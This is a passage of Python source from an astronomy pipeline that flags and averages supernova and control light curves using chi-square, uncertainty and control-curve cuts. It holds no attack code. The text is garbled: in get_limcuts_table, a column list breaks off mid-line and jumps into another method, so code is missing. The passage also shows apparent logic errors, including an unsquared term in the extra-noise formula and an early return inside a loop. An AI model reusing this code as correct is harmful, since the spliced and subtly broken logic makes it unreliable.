\n\t\t\t\tdropcols.append(col)\n\n\t\t# drop any extra columns\n\t\tif len(dropcols)>0: \n\t\t\t#print('Dropping extra columns: ',dropcols)\n\t\t\tlc.lcs[control_index].t.drop(columns=dropcols,inplace=True)\n\n\t\treturn lc\n\n\tdef apply_true_uncertainties(self, lc):\n\t\toutput = ''\n\t\tfor control_index in range(self.num_controls+1):\n\t\t\tif control_index == 0:\n\t\t\t\tprint('\\nNow estimating true uncertainties for SN light curve...')\n\n\t\t\t\tif len(lc.corrected_baseline_ix) <= 0:\n\t\t\t\t\tprint('WARNING: No available baseline flux! Cannot proceed with true uncertainties estimation. Skipping...')\n\t\t\t\t\toutput += '\\nNot enough available baseline flux! Could not proceed with true uncertainties estimation.'\n\t\t\t\t\tfor control_index in range(self.num_controls+1):\n\t\t\t\t\t\tlc.dflux_colnames[control_index] = 'duJy'\n\t\t\t\t\treturn lc, output, False\n\n\t\t\t\tclean_ix = AandB(lc.lcs[0].ix_unmasked('Mask',maskval=self.flags['uncertainty']), lc.lcs[0].ix_inrange(colnames=['chi/N'],uplim=self.estimate_true_uncertainties_chisquare_cut,exclude_uplim=True))\n\t\t\t\tclean_ix = AandB(lc.corrected_baseline_ix, clean_ix)\n\t\t\telse:\n\t\t\t\tprint(f'Now estimating true uncertainties for control light curve {control_index:03d}...')\n\t\t\t\tclean_ix = AandB(lc.lcs[control_index].ix_unmasked('Mask',maskval=self.flags['uncertainty']), lc.lcs[control_index].ix_inrange(colnames=['chi/N'],uplim=self.estimate_true_uncertainties_chisquare_cut,exclude_uplim=True))\n\n\t\t\tlc.lcs[control_index].calcaverage_sigmacutloop('uJy', indices=clean_ix, Nsigma=3.0, median_firstiteration=True, verbose=1)\n\t\t\t#if control_index == 0: print(lc.lcs[control_index].statparams)\n\t\t\tsigma_true_typical = lc.lcs[control_index].statparams['stdev']\n\n\t\t\tmedian_dflux = np.median(lc.lcs[control_index].t.loc[clean_ix, 'duJy'])\n\n\t\t\tif sigma_true_typical > median_dflux:\n\t\t\t\tprint(f'# True typical uncertainty {sigma_true_typical:0.2f} greater the current median uncertainty {median_dflux:0.2f}. Proceeding with true uncertainties estimation...')\n\n\t\t\t\t# for following cuts, use updated uncertainty column for this light curve\n\t\t\t\tlc.dflux_colnames[control_index] = 'duJy_new'\n\n\t\t\t\t# add extra noise source to current noise in new column\n\t\t\t\tsigma_extra = np.sqrt(sigma_true_typical*sigma_true_typical - median_dflux)\n\t\t\t\tprint(f'# Sigma extra calculated: {sigma_extra:0.4f}')\n\t\t\t\t#print('# Adding sigma_extra {sigma_extra:0.4f} to new duJy column...')\n\t\t\t\tlc.lcs[control_index].t['duJy_new'] = np.nan\n\t\t\t\tlc.lcs[control_index].t['duJy_new'] = np.sqrt(lc.lcs[control_index].t['duJy']**2 + sigma_extra**2)\n\n\t\t\t\t#lc.lcs[control_index].t['uJy/duJy_new'] = lc.lcs[control_index].t['uJy']/lc.lcs[control_index].t['duJy_new']\n\n\t\t\t\tif control_index == 0:\n\t\t\t\t\toutput += f' An extra noise of sigma {sigma_extra:0.4f} was added to the uncertainties of the SN light curve and copied to the \"duJy_new\" column.'\n\t\t\t\n\t\t\t\treturn lc, output, True\n\t\t\telse:\n\t\t\t\tprint(f'# True typical uncertainty less than or equal to the current median uncertainty. Skipping true uncertainties estimation.')\n\t\t\t\treturn lc, output, False\n\n\n\t# apply uncertainty cut to SN light curve and update mask column with flag\n\tdef apply_uncertainty_cut(self, lc):\n\t\tprint('\\nNow applying uncertainty cut...')\n\n\t\t# update SN mask column with final chi-square cut and apply same cut to control light curves\n\t\tfor control_index in range(self.num_controls+1):\n\t\t\tcut_ix = lc.lcs[control_index].ix_inrange(colnames=['duJy'], lowlim=self.uncertainty_cut, exclude_lowlim=True)\n\t\t\tlc.update_mask_col(self.flags['uncertainty'], cut_ix, control_index=control_index)\n\t\t\tif control_index == 0:\n\t\t\t\ts = f'Total percent of data flagged: {100*len(cut_ix)/len(lc.lcs[0].getindices()):0.2f}%'\n\t\t\t\toutput = f'\\n\\n{s}.'\n\t\t\t\tprint(f'# {s}')\n\n\t\treturn lc, output\n\n\t# for a range of chi-square cuts, determine contamination, loss, and other pecentages\n\tdef get_limcuts_table(self, lc, indices=None):\n\t\tlimcuts = pdastrostatsclass(columns=['PSF Chi-Square Cut', 'N', 'Ngood', 'Nbad', 'Nkept', 'Ncut', 'Ngood,kept', 'Ngood,cut', 'Nbad,kept', 'Nbad,cut',\n\t\t\t\t\t\t\t\t\t\t\t 'Pgood,kept', 'Pgood,cut', 'Pbad,kept', 'Pbad,cut', 'Ngood,kept/Ngood', 'Ploss', 'Pcontamination',\n\t\t\t\t\t\t\t\t\t\t\t 'Nbad,cut 3 self.loss_lim and max_loss > self.loss_lim:\n\t\t\t\tloss_case = 'above lim'\n\t\t\t\ta = np.where(limcuts.t['Ploss'] == min_loss)[0]\n\t\t\t\tb = limcuts.t.iloc[a]\n\t\t\t\tc = b.iloc[(b['PSF Chi-Square Cut']).argsort()].reset_index()\n\t\t\t\tloss_cut = c.loc[0,'PSF Chi-Square Cut']\n\t\t\t# else if loss crosses lim at some point, loss_cut is min cut with max% loss <= loss_lim\n\t\t\telse:\n\t\t\t\tloss_case = 'crosses lim'\n\t\t\t\tvalid_cuts = sortby_loss[sortby_loss['Ploss'] <= self.loss_lim]\n\t\t\t\ta = np.where(limcuts.t['Ploss'] == valid_cuts.loc[len(valid_cuts)-1,'Ploss'])[0]\n\t\t\t\t# sort by cuts\n\t\t\t\tb = limcuts.t.iloc[a]\n\t\t\t\tc = b.iloc[(b['PSF Chi-Square Cut']).argsort()].reset_index()\n\t\t\t\t# get midpoint of loss1 and loss2 (two points on either side of lim)\n\t\t\t\tloss1_i = np.where(limcuts.t['PSF Chi-Square Cut'] == c.loc[0,'PSF Chi-Square Cut'])[0][0]\n\t\t\t\tif limcuts.t.loc[loss1_i,'Ploss'] == self.loss_lim:\n\t\t\t\t\tloss_cut = limcuts.t.loc[loss1_i,'PSF Chi-Square Cut']\n\t\t\t\telse:\n\t\t\t\t\tloss2_i = loss1_i - 1\n\t\t\t\t\tx = np.array([limcuts.t.loc[loss1_i,'PSF Chi-Square Cut'], limcuts.t.loc[loss2_i,'PSF Chi-Square Cut']])\n\t\t\t\t\tcontam_y = np.array([limcuts.t.loc[loss1_i,'Pcontamination'], limcuts.t.loc[loss2_i,'Pcontamination']])\n\t\t\t\t\tloss_y = np.array([limcuts.t.loc[loss1_i,'Ploss'], limcuts.t.loc[loss2_i,'Ploss']])\n\t\t\t\t\tcontam_line = np.polyfit(x,contam_y,1)\n\t\t\t\t\tloss_line = np.polyfit(x,loss_y,1)\n\t\t\t\t\tloss_cut = (self.loss_lim-loss_line[1])/loss_line[0]\n\n\t\tsortby_contam = limcuts.t.iloc[(limcuts.t['Pcontamination']).argsort()].reset_index()\n\t\tmin_contam = sortby_contam.loc[0,'Pcontamination']\n\t\tmax_contam = sortby_contam.loc[len(sortby_contam)-1,'Pcontamination']\n\t\t# if all contam below lim, contam_cut is max cut\n\t\tif min_contam < self.contam_lim and max_contam < self.contam_lim:\n\t\t\tcontam_case = 'below lim'\n\t\t\tcontam_cut = limcuts.t.loc[len(limcuts.t)-1,'PSF Chi-Square Cut']\n\t\telse:\n\t\t\t# else if all contam above lim, contam_cut is max cut with min% contam\n\t\t\tif min_contam > self.contam_lim and max_contam > self.contam_lim:\n\t\t\t\tcontam_case = 'above lim'\n\t\t\t\ta = np.where(limcuts.t['Pcontamination'] == min_contam)[0]\n\t\t\t\tb = limcuts.t.iloc[a]\n\t\t\t\tc = b.iloc[(b['PSF Chi-Square Cut']).argsort()].reset_index()\n\t\t\t\tcontam_cut = c.loc[len(c)-1,'PSF Chi-Square Cut']\n\t\t\t# else if contam crosses lim at some point, contam_cut is max cut with max% contam <= contam_lim\n\t\t\telse:\n\t\t\t\tcontam_case = 'crosses lim'\n\t\t\t\tvalid_cuts = sortby_contam[sortby_contam['Pcontamination'] <= self.contam_lim]\n\t\t\t\ta = np.where(limcuts.t['Pcontamination'] == valid_cuts.loc[len(valid_cuts)-1,'Pcontamination'])[0]\n\t\t\t\t# sort by cuts\n\t\t\t\tb = limcuts.t.iloc[a]\n\t\t\t\tc = b.iloc[(b['PSF Chi-Square Cut']).argsort()].reset_index()\n\t\t\t\tcontam1_i = np.where(limcuts.t['PSF Chi-Square Cut'] == c.loc[len(c)-1,'PSF Chi-Square Cut'])[0][0]\n\t\t\t\tif limcuts.t.loc[contam1_i,'Pcontamination'] == self.contam_lim:\n\t\t\t\t\tcontam_cut = limcuts.t.loc[contam1_i,'PSF Chi-Square Cut']\n\t\t\t\telse:\n\t\t\t\t\tcontam2_i = contam1_i + 1\n\t\t\t\t\tx = np.array([limcuts.t.loc[contam1_i,'PSF Chi-Square Cut'], limcuts.t.loc[contam2_i,'PSF Chi-Square Cut']])\n\t\t\t\t\tcontam_y = np.array([limcuts.t.loc[contam1_i,'Pcontamination'], limcuts.t.loc[contam2_i,'Pcontamination']])\n\t\t\t\t\tloss_y = np.array([limcuts.t.loc[contam1_i,'Ploss'], limcuts.t.loc[contam2_i,'Ploss']])\n\t\t\t\t\tcontam_line = np.polyfit(x,contam_y,1)\n\t\t\t\t\tloss_line = np.polyfit(x,loss_y,1)\n\t\t\t\t\tcontam_cut = (self.contam_lim - contam_line[1])/contam_line[0]\n\n\t\tloss_cut_data = self.get_limcuts_data(lc, 'loss_cut', loss_cut, loss_case)\n\t\tcontam_cut_data = self.get_limcuts_data(lc, 'contam_cut', contam_cut, contam_case)\n\n\t\treturn contam_cut_data, loss_cut_data\n\n\t# choose between contamination cut and loss cut\n\tdef get_final_chisquare_cut(self, contam_cut, loss_cut, contam_case, loss_case):\n\t\tcase1 = loss_case == 'below lim' or contam_case == 'below lim'\n\t\tcase2 = loss_case == 'above lim' or contam_case == 'above lim'\n\t\tcase3 = loss_case == 'crosses lim' or contam_case == 'crosses lim'\n\n\t\t# case 1 and 1: final_cut = 3\n\t\t# case 1 and 2: take limit of case 2\n\t\t# case 1 and 3: take limit of case 3\n\t\t# case 2 and 2: print lims don't work\n\t\t# case 2 and 3: get_final_chisquare_cut\n\t\t# case 3 and 3: get_final_chisquare_cut\n\n\t\tfinal_cut = None\n\t\tif case1 and not case2 and not case3: # 1 and 1\n\t\t\tprint(f'# Valid chi-square cut range from {loss_cut:0.2f} to {contam_cut:0.2f}! Setting to {self.min_cut:0.2f}...')\n\t\t\tfinal_cut = self.min_cut\n\t\telif case1: # 1\n\t\t\tif case2: # and 2\n\t\t\t\tif loss_case == 'above lim':\n\t\t\t\t\tprint(f'# WARNING: contam_cut <= {contam_cut:0.2f} falls below limit {self.contam_lim:0.2f}%, but loss_cut >= {loss_cut:0.2f} falls above limit {self.loss_lim:0.2f}%! Setting to {loss_cut:0.2f}...')\n\t\t\t\t\tfinal_cut = loss_cut\n\t\t\t\telse:\n\t\t\t\t\tprint(f'# WARNING: loss_cut <= {loss_cut:0.2f} falls below limit {self.loss_lim:0.2f}%, but contam_cut >= {contam_cut:0.2f} falls above limit {self.contam_lim:0.2f}%! Setting to {contam_cut:0.2f}...')\n\t\t\t\t\tfinal_cut = contam_cut\n\t\t\telse: # and 3\n\t\t\t\tif loss_case == 'crosses lim':\n\t\t\t\t\tprint(f'# contam_cut <= {contam_cut:0.2f} falls below limit {self.contam_lim:0.2f}% and loss_cut >= {loss_cut:0.2f} crosses limit {self.loss_lim:0.2f}%, setting to {loss_cut:0.2f}...')\n\t\t\t\t\tfinal_cut = loss_cut\n\t\t\t\telse:\n\t\t\t\t\tprint(f'# loss_cut <= {loss_cut:0.2f} falls below limit {self.loss_lim:0.2f}% and contam_cut >= {contam_cut:0.2f} crosses limit {self.contam_lim:0.2f}%, setting to {contam_cut:0.2f}...')\n\t\t\t\t\tfinal_cut = contam_cut\n\t\telif case2 and not case3: # 2 and 2\n\t\t\tprint(f'# ERROR: chi-square loss_cut >= {loss_cut:0.2f} and contam_cut <= {contam_cut:0.2f} both fall above respective limits {self.loss_lim:0.2f}% and {self.contam_lim:0.2f}%! Try setting less strict limits. Setting final cut to nan.')\n\t\t\tfinal_cut = np.nan\n\t\telse: # 2 and 3 or 3 and 3\n\t\t\tif loss_cut > contam_cut:\n\t\t\t\tprint(f'# WARNING: chi-square loss_cut >= {loss_cut:0.2f} and contam_cut <= {contam_cut:0.2f} do not overlap!')\n\t\t\t\tif self.lim_to_prioritize == 'contam_lim':\n\t\t\t\t\tprint(f'# Prioritizing {self.lim_to_prioritize} and setting to {contam_cut:0.2f}...')\n\t\t\t\t\tfinal_cut = contam_cut\n\t\t\t\telse:\n\t\t\t\t\tprint(f'# Prioritizing {self.lim_to_prioritize} and setting to {loss_cut:0.2f}...')\n\t\t\t\t\tfinal_cut = loss_cut\n\t\t\telse:\n\t\t\t\tprint(f'# Valid chi-square cut range from {loss_cut:0.2f} to {contam_cut:0.2f}!')\n\t\t\t\tif self.lim_to_prioritize == 'contam_lim':\n\t\t\t\t\tprint(f'# Prioritizing {self.lim_to_prioritize} and setting to {loss_cut:0.2f}...')\n\t\t\t\t\tfinal_cut = loss_cut\n\t\t\t\telse:\n\t\t\t\t\tprint(f'# Prioritizing {self.lim_to_prioritize} and setting to {contam_cut:0.2f}...')\n\t\t\t\t\tfinal_cut = contam_cut\n\t\treturn final_cut\n\n\t# apply chi-square cut to SN light curve and update mask column with flag\n\tdef apply_chisquare_cut(self, args, lc, plot=None):\n\t\tprint('\\nNow applying dynamic chi-square cut...')\n\n\t\tif self.chisquare_cut is None:\n\t\t\tlimcuts = self.get_limcuts_table(lc)\n\t\t\tcontam_cut_data, loss_cut_data = self.get_limcuts(lc, limcuts)\n\n\t\t\tif args.plot:\n\t\t\t\tif plot is None:\n\t\t\t\t\traise RuntimeError('Plot object not passed to apply_chisquare_cut()!')\n\t\t\t\tplot.plot_limcuts(limcuts, contam_cut_data['cut'], loss_cut_data['cut'], self.contam_lim, self.loss_lim, self.min_cut, self.max_cut)\n\n\t\t\tprint(f'# Contamination cut according to given contam_limit, with {contam_cut_data[\"Pcontamination\"]:0.2f}% contamination and {contam_cut_data[\"Ploss\"]:0.2f}% loss: {contam_cut_data[\"cut\"]:0.2f}')\n\t\t\tif contam_cut_data['case'] == 'above lim':\n\t\t\t\tprint(f'## WARNING: Contamination cut not possible with contamination <= contam_lim {self.contam_lim:0.2f}%!')\n\t\t\tprint(f'# Loss cut according to given loss_limit, with {loss_cut_data[\"Pcontamination\"]:0.2f}% contamination and {loss_cut_data[\"Ploss\"]:0.2f}% loss: {loss_cut_data[\"cut\"]:0.2f}')\n\t\t\tif loss_cut_data['case'] == 'above lim':\n\t\t\t\tprint(f'## WARNING: Loss cut not possible with loss <= loss_lim {self.loss_lim:0.2f}%!')\n\n\t\t\tfinal_cut = self.get_final_chisquare_cut(contam_cut_data['cut'], loss_cut_data['cut'], contam_cut_data['case'], loss_cut_data['case'])\n\n\t\t\tif np.isnan(final_cut):\n\t\t\t\traise RuntimeError('\\n# ERROR: Final suggested chi-square cut could not be determined according to given contamination and loss limits. We suggest resetting your limits in params.ini.')\n\t\t\telse:\n\t\t\t\tif final_cut == contam_cut_data['cut']:\n\t\t\t\t\tPcontamination = contam_cut_data['Pcontamination']\n\t\t\t\t\tPloss = contam_cut_data['Ploss']\n\t\t\t\telse:\n\t\t\t\t\tPcontamination = loss_cut_data['Pcontamination']\n\t\t\t\t\tPloss = loss_cut_data['Ploss']\n\t\t\t\tprint(f'# Final suggested chi-square cut is {final_cut:0.2f}, with {Pcontamination:0.2f}% contamination and {Ploss:0.2f}% loss.')\n\t\t\t\tif (Pcontamination > self.contam_lim):\n\t\t\t\t\tprint(f'## WARNING: Final cut\\'s contamination {Pcontamination:0.2f}% exceeds {self.contam_lim:0.2f}%!')\n\t\t\t\tif (Ploss > self.loss_lim):\n\t\t\t\t\tprint(f'## WARNING: Final cut\\'s loss {Ploss:0.2f}% exceeds loss_lim {self.loss_lim:0.2f}%!')\n\t\t\n\t\t\toutput = f'\\n\\t- The cut optimized according to the given contamination limit of {self.contam_lim:0.2f}% was {contam_cut_data[\"cut\"]:0.2f}, with a contamination of {contam_cut_data[\"Pcontamination\"]:0.2f}% and a loss of {contam_cut_data[\"Ploss\"]:0.2f}%.'\n\t\t\toutput += f'\\n\\t- The cut optimized according to the given loss limit of {self.loss_lim:0.2f}% was {loss_cut_data[\"cut\"]:0.2f}, with a contamination of {loss_cut_data[\"Pcontamination\"]:0.2f}% and a loss of {loss_cut_data[\"Ploss\"]:0.2f}%.'\n\t\telse:\n\t\t\tfinal_cut = self.chisquare_cut\n\n\t\t\tprint(f'Chi-square cut set to {final_cut} manually by user, overriding dynamic chi-square cut')\n\t\t\toutput = f'Cut was manually set to {final_cut} by user, overriding dynamic chi-square cut.'\n\n\t\t# update SN mask column with final chi-square cut and apply same cut to control light curves\n\t\tfor control_index in range(self.num_controls+1):\n\t\t\tcut_ix = lc.lcs[control_index].ix_inrange(colnames=['chi/N'], lowlim=final_cut, exclude_lowlim=True)\n\t\t\tlc.update_mask_col(self.flags['chisquare'], cut_ix, control_index=control_index)\n\t\t\tif control_index == 0:\n\t\t\t\ts = f'Total percent of data flagged: {100*len(cut_ix)/len(lc.lcs[0].getindices()):0.2f}%'\n\t\t\t\toutput += f'\\n\\n{s}.'\n\t\t\t\tprint(f'# {s}')\n\n\t\tif args.plot:\n\t\t\treturn lc, final_cut, output, plot\n\t\telse:\n\t\t\treturn lc, final_cut, output\n\n\t# make sure that for every SN measurement, we have corresponding control light curve \n\t# measurements at that MJD\n\tdef verify_mjds(self, lc):\n\t\tprint('# Making sure SN and control light curve MJDs match up exactly...')\n\t\t# sort SN lc by MJD\n\t\tmjd_sorted_i = lc.lcs[0].ix_sort_by_cols('MJD')\n\t\tlc.lcs[0].t = lc.lcs[0].t.loc[mjd_sorted_i]\n\t\tsn_sorted = lc.lcs[0].t.loc[mjd_sorted_i,'MJD'].to_numpy()\n\n\t\tfor control_index in range(1,self.num_controls+1):\n\t\t\t# sort control light curves by MJD\n\t\t\tmjd_sorted_i = lc.lcs[control_index].ix_sort_by_cols('MJD')\n\t\t\tcontrol_sorted = lc.lcs[control_index].t.loc[mjd_sorted_i,'MJD'].to_numpy()\n\t\t\t\n\t\t\t# compare control light curve to SN light curve and, if out of agreement, fix\n\t\t\tif (len(sn_sorted) != len(control_sorted)) or (np.array_equal(sn_sorted, control_sorted) is False):\n\t\t\t\tprint('## MJDs out of agreement for control light curve %03d, fixing...' % control_index)\n\n\t\t\t\tmjds_onlysn = AnotB(sn_sorted, control_sorted)\n\t\t\t\tmjds_onlycontrol = AnotB(control_sorted, sn_sorted)\n\n\t\t\t\t# for the MJDs only in SN, add row with that MJD to control light curve, with all values of other columns NaN\n\t\t\t\tif len(mjds_onlysn) > 0:\n\t\t\t\t\tprint('### Adding %d NaN rows to control light curve...' % len(mjds_onlysn))\n\t\t\t\t\tfor mjd in mjds_onlysn:\n\t\t\t\t\t\tlc.lcs[control_index].newrow({'MJD':mjd,'Mask':0})\n\t\t\t\t\n\t\t\t\t# remove indices of rows in control light curve for which there is no MJD in the SN lc\n\t\t\t\tif len(mjds_onlycontrol) > 0:\n\t\t\t\t\tprint('### Removing %d control light curve row(s) without matching SN row(s)...' % len(mjds_onlycontrol))\n\t\t\t\t\tindices2skip = []\n\t\t\t\t\tfor mjd in mjds_onlycontrol:\n\t\t\t\t\t\tix = lc.lcs[control_index].ix_equal('MJD',mjd)\n\t\t\t\t\t\tif len(ix)!=1:\n\t\t\t\t\t\t\traise RuntimeError(f'### Couldn\\'t find MJD={mjd} in column MJD, but should be there!')\n\t\t\t\t\t\tindices2skip.extend(ix)\n\t\t\t\t\tindices = AnotB(lc.lcs[control_index].getindices(),indices2skip)\n\t\t\t\telse:\n\t\t\t\t\tindices = lc.lcs[control_index].getindices()\n\t\t\t\t\n\t\t\t\tix_sorted = lc.lcs[control_index].ix_sort_by_cols('MJD',indices=indices)\n\t\t\t\tlc.lcs[control_index].t = lc.lcs[control_index].t.loc[ix_sorted]\n\t\t\n\t\treturn lc \n\n\tdef get_control_stats(self, lc):\n\t\tprint('# Calculating control light curve statistics...')\n\n\t\t# construct arrays for control lc data\n\t\tuJy = np.full((self.num_controls, len(lc.lcs[0].t['MJD'])), np.nan)\n\t\tduJy = np.full((self.num_controls, len(lc.lcs[0].t['MJD'])), np.nan)\n\t\tMask = np.full((self.num_controls, len(lc.lcs[0].t['MJD'])), 0, dtype=np.int32)\n\t\t\n\t\tfor control_index in range(1,self.num_controls+1):\n\t\t\tif (len(lc.lcs[control_index].t) != len(lc.lcs[0].t['MJD'])) or (np.array_equal(lc.lcs[0].t['MJD'], lc.lcs[control_index].t['MJD']) is False):\n\t\t\t\traise RuntimeError(f'## sERROR: SN lc not equal to control lc for control_index {control_index}! Rerun or debug verify_mjds().')\n\t\t\telse:\n\t\t\t\tuJy[control_index-1,:] = lc.lcs[control_index].t['uJy']\n\t\t\t\tduJy[control_index-1,:] = lc.lcs[control_index].t[lc.dflux_colnames[control_index]]\n\t\t\t\tMask[control_index-1,:] = lc.lcs[control_index].t['Mask']\n\n\t\tc2_param2columnmapping = lc.lcs[0].intializecols4statparams(prefix='c2_',format4outvals='{:.2f}',skipparams=['converged','i'])\n\n\t\tfor index in range(uJy.shape[-1]):\n\t\t\tpda4MJD = pdastrostatsclass()\n\t\t\tpda4MJD.t['uJy'] = uJy[0:,index]\n\t\t\tpda4MJD.t['duJy'] = duJy[0:,index]\n\t\t\tpda4MJD.t['Mask'] = np.bitwise_and(Mask[0:,index], self.flags['chisquare']|self.flags['uncertainty'])\n\t\t\t\n\t\t\tpda4MJD.calcaverage_sigmacutloop('uJy',noisecol='duJy',maskcol='Mask',maskval=(self.flags['chisquare']|self.flags['uncertainty']),verbose=1,Nsigma=3.0,median_firstiteration=True)\n\t\t\tlc.lcs[0].statresults2table(pda4MJD.statparams, c2_param2columnmapping, destindex=index) \n\n\t\treturn lc\n\n\tdef print_control_flag_stats(self, lc):\n\t\tprint('# Control light curve cut results:')\n\t\tprint('## Length of SN light curve: %d' % len(lc.lcs[0].t))\n\t\tprint('## Percent of data above x2_max bound: %0.2f%%' % (100*len(lc.lcs[0].ix_masked('Mask',maskval=self.flags['controls_x2']))/len(lc.lcs[0].t)))\n\t\tprint('## Percent of data above stn_max bound: %0.2f%%' % (100*len(lc.lcs[0].ix_masked('Mask',maskval=self.flags['controls_stn']))/len(lc.lcs[0].t)))\n\t\tprint('## Percent of data above Nclip_max bound: %0.2f%%' % (100*len(lc.lcs[0].ix_masked('Mask',maskval=self.flags['controls_Nclip']))/len(lc.lcs[0].t)))\n\t\tprint('## Percent of data below Ngood_min bound: %0.2f%%' % (100*len(lc.lcs[0].ix_masked('Mask',maskval=self.flags['controls_Ngood']))/len(lc.lcs[0].t)))\n\t\t\n\t\ts = 'Total percent of data flagged as bad: %0.2f%%' % (100*len(lc.lcs[0].ix_masked('Mask',maskval=self.flags['controls_bad']))/len(lc.lcs[0].t))\n\t\tprint(f'## {s}')\n\t\toutput = f'\\n\\n {s}.'\n\t\ts = 'Total percent of data flagged as questionable (not masked with control light curve flags but Nclip > 0): %0.2f%%' % (100*len(lc.lcs[0].ix_masked('Mask',maskval=self.flags['controls_questionable']))/len(lc.lcs[0].t))\n\t\tprint(f'## {s}')\n\t\toutput += f'\\n {s}.'\n\n\t\treturn output\n\n\t# apply control light curve cut to SN light curve and update mask column with flag\n\tdef apply_control_cut(self, lc):\n\t\tprint('\\nNow applying control light curve cut...')\n\n\t\t# clear any previous flags in control light curves' 'Mask' columns\n\t\t#for control_index in range(1,self.num_controls+1):\n\t\t\t#lc.lcs[control_index].t['Mask'] = 0\n\n\t\t#lc = self.verify_mjds(lc)\n\t\tlc = self.get_control_stats(lc)\n\n\t\tprint('# Flagging SN light curve based on control light curve statistics...')\n\t\tlc.lcs[0].t['c2_abs_stn'] = lc.lcs[0].t['c2_mean']/lc.lcs[0].t['c2_mean_err']\n\n\t\t# flag measurements according to given bounds\n\t\tflag_x2_i = lc.lcs[0].ix_inrange(colnames=['c2_X2norm'], lowlim=self.c_x2_max, exclude_lowlim=True)\n\t\tlc.update_mask_col(self.flags['controls_x2'], flag_x2_i)\n\t\tflag_stn_i = lc.lcs[0].ix_inrange(colnames=['c2_abs_stn'], lowlim=self.stn_max, exclude_lowlim=True)\n\t\tlc.update_mask_col(self.flags['controls_stn'], flag_stn_i)\n\t\tflag_nclip_i = lc.lcs[0].ix_inrange(colnames=['c2_Nclip'], lowlim=self.c_Nclip_max, exclude_lowlim=True)\n\t\tlc.update_mask_col(self.flags['controls_Nclip'], flag_nclip_i)\n\t\tflag_ngood_i = lc.lcs[0].ix_inrange(colnames=['c2_Ngood'], uplim=self.c_Ngood_min, exclude_uplim=True)\n\t\tlc.update_mask_col(self.flags['controls_Ngood'], flag_ngood_i)\n\n\t\t# update mask column with control light curve cut on any measurements flagged according to given bounds\n\t\tzero_Nclip_i = lc.lcs[0].ix_equal('c2_Nclip', 0)\n\t\tunmasked_i = lc.lcs[0].ix_unmasked('Mask', maskval=self.flags['controls_x2']|self.flags['controls_stn']|self.flags['controls_Nclip']|self.flags['controls_Ngood'])\n\t\tlc.update_mask_col(self.flags['controls_questionable'], AnotB(unmasked_i,zero_Nclip_i))\n\t\tlc.update_mask_col(self.flags['controls_bad'], AnotB(lc.lcs[0].getindices(),unmasked_i))\n\n\t\t# copy over SN's control cut flags to control light curve 'Mask' column\n\t\tflags_arr = np.full(lc.lcs[0].t['Mask'].shape, (self.flags['controls_bad']|\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.flags['controls_questionable']|\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.flags['controls_x2']|\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.flags['controls_stn']|\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.flags['controls_Nclip']|\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.flags['controls_Ngood']))\n\t\tflags_to_copy = np.bitwise_and(lc.lcs[0].t['Mask'], flags_arr)\n\t\tfor control_index in range(1,self.num_controls+1):\n\t\t\tlc.lcs[control_index].t['Mask'] = lc.lcs[control_index].t['Mask'].astype(np.int32)\n\t\t\tif len(lc.lcs[control_index].t) < 1:\n\t\t\t\tcontinue\n\t\t\telif len(lc.lcs[control_index].t) == 1:\n\t\t\t\tlc.lcs[control_index].t.loc[0,'Mask']= int(lc.lcs[control_index].t.loc[0,'Mask']) | flags_to_copy\n\t\t\telse:\n\t\t\t\tlc.lcs[control_index].t['Mask'] = np.bitwise_or(lc.lcs[control_index].t['Mask'], flags_to_copy)\n\t\t\n\t\toutput = self.print_control_flag_stats(lc)\n\n\t\treturn lc, output\n\n\tdef average_lc(self, lc, avglc, control_index=0):\n\t\tif control_index == 0:\n\t\t\tprint(f'\\nNow averaging SN light curve...')\n\t\telse:\n\t\t\tprint(f'Now averaging control light curve {control_index:03d}...')\n\n\t\tavglc.lcs[control_index] = pdastrostatsclass()\n\n\t\tmjd = int(np.amin(lc.lcs[control_index].t['MJD']))\n\t\tmjd_max = int(np.amax(lc.lcs[control_index].t['MJD']))+1\n\n\t\tgood_i = lc.lcs[control_index].ix_unmasked('Mask', maskval=self.flags['chisquare']|self.flags['uncertainty']|self.flags['controls_bad'])\n\n\t\twhile mjd <= mjd_max:\n\t\t\trange_i = lc.lcs[control_index].ix_inrange(colnames=['MJD'], lowlim=mjd, uplim=mjd+self.mjd_bin_size, exclude_uplim=True)\n\t\t\trange_good_i = AandB(range_i,good_i)\n\n\t\t\t# add new row to averaged light curve if keep_empty_bins or any measurements present\n\t\t\t#if self.keep_empty_bins or len(range_i) >= 1:\n\t\t\tnew_row = {'MJDbin':mjd+0.5*self.mjd_bin_size, 'Nclip':0, 'Ngood':0, 'Nexcluded':len(range_i)-len(range_good_i), 'Mask':0}\n\t\t\tavglc_index = avglc.lcs[control_index].newrow(new_row)\n\t\t\t\n\t\t\t# if no measurements present, flag or skip over day\n\t\t\tif len(range_i) < 1:\n\t\t\t\t#if self.keep_empty_bins:\n\t\t\t\tavglc.update_mask_col(self.flags['avg_badday'], [avglc_index], control_index=control_index)\n\t\t\t\tmjd += self.mjd_bin_size\n\t\t\t\tcontinue\n\t\t\t\n\t\t\t# if no good measurements, average values anyway and flag\n\t\t\tif len(range_good_i) < 1:\n\t\t\t\t# average flux\n\t\t\t\tlc.lcs[control_index].calcaverage_sigmacutloop('uJy', noisecol=lc.dflux_colnames[control_index], indices=range_i, Nsigma=3.0, median_firstiteration=True)\n\t\t\t\tfluxstatparams = deepcopy(lc.lcs[control_index].statparams)\n\n\t\t\t\t# get average mjd\n\t\t\t\t# TO DO: SHOULD NOISECOL HERE BE DUJY OR NONE??\n\t\t\t\tlc.lcs[control_index].calcaverage_sigmacutloop('MJD', indices=fluxstatparams['ix_good'], Nsigma=0, median_firstiteration=False)\n\t\t\t\tavg_mjd = lc.lcs[control_index].statparams['mean']\n\n\t\t\t\t# add row and flag\n\t\t\t\tavglc.lcs[control_index].add2row(avglc_index, {'MJD':avg_mjd, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'uJy':fluxstatparams['mean'], \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'duJy':fluxstatparams['mean_err'], \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'stdev':fluxstatparams['stdev'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'x2':fluxstatparams['X2norm'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 'Nclip':fluxstatparams['Nclip'],\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t 